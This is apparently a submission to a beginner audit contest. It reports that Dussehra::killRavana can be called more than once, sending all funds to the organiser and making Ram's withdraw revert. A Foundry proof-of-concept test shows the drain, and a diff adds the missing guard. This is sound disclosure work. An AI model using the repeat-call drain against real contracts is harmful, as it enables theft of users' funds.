First Flight #17: Dussehra
First Flight #17
Beginner FriendlyFoundryNFT
100 EXP
View results
Previous Next
Submission Details
Severity: medium
Valid

The `Dussehra::withdraw`Function Will Always revert and Ram can't withdraw his reward

nem0x001

The Dussehra::withdrawFunction Will Always revert and Ram can't withdraw his reward

Description:

As Mentioned Previously Dussehra::KillRaven function has a vuln which leads to organiser can get all protocol money. which makes Dussehra::withdraw function useless and choosenRam can't withdraw his reward.

Impact:

  • The chosen Ram is unable to withdraw his entitled reward due to the function always reverting. This defeats the purpose of the reward mechanism and leaves the reward funds inaccessible.

Proof of Concept:

  • Use the following PoC in Dussehra.t.sol

function test_MalicousOrganizerOrMultipleKillRavenCall () public participants {
//Participants modifier enters 2 users with fee 1e18 for every user
//1- ChoosingRam
vm.warp(1728691200 + 1);
vm.startPrank(organiser);
choosingRam.selectRamIfNotSelected();
address selectedRam=choosingRam.selectedRam();
vm.stopPrank();
//2- calling killRavana multiple times
uint organiserIntialBalance=address(organiser).balance;//0
uint dussehraIntialBalance=address(dussehra).balance; // 2e18 come from modifier
vm.startPrank(player1);
console.log("OrganizerIntialBalance :",address(organiser).balance);
console.log("DussehraIntialBalance:",address(dussehra).balance);
//first call
dussehra.killRavana( );
console.log("OrganizerBalanceAfterFirstCall :",address(organiser).balance);
console.log("DussehraBalanceAfterFirstCall:",address(dussehra).balance);
// 50% will go to organiser and 50% to ram
// which means in This case
// 1e18 for organiser and remain 1e18 will remain in the contract for ram
assert(address(organiser).balance==address(dussehra).balance);
//second call
dussehra.killRavana( );
console.log("OrganizerBalanceAfterSecondCall :",address(organiser).balance);
console.log("DussehraBalanceAfterSecondCall:",address(dussehra).balance);
assertEq(address(dussehra).balance,0);
assertEq(address(organiser).balance,dussehraIntialBalance+organiserIntialBalance);
vm.stopPrank();
//selectedRam trying to withdraw the reward but it failed
vm.prank(selectedRam);
vm.expectRevert();
dussehra.withdraw();
}

Recommended Mitigation:

  • Use Access Control which prevent calling killRavana Multiple Times will solve the issue

function killRavana() public RamIsSelected {
if (block.timestamp < 1728691069) {
revert Dussehra__MahuratIsNotStart();
}
if (block.timestamp > 1728777669) {
revert Dussehra__MahuratIsFinished();
}
+ if (IsRavanKilled){
+ revert(RavanaIsAlreadyKilled());
+ }
IsRavanKilled = true;
uint256 totalAmountByThePeople = WantToBeLikeRam.length * entranceFee;
totalAmountGivenToRam = (totalAmountByThePeople * 50) / 100;
(bool success, ) = organiser.call{value: totalAmountGivenToRam}("");
require(success, "Failed to send money to organiser");
}
Updates

Lead Judging Commences

bube Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

isRavanKilled is not checked

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!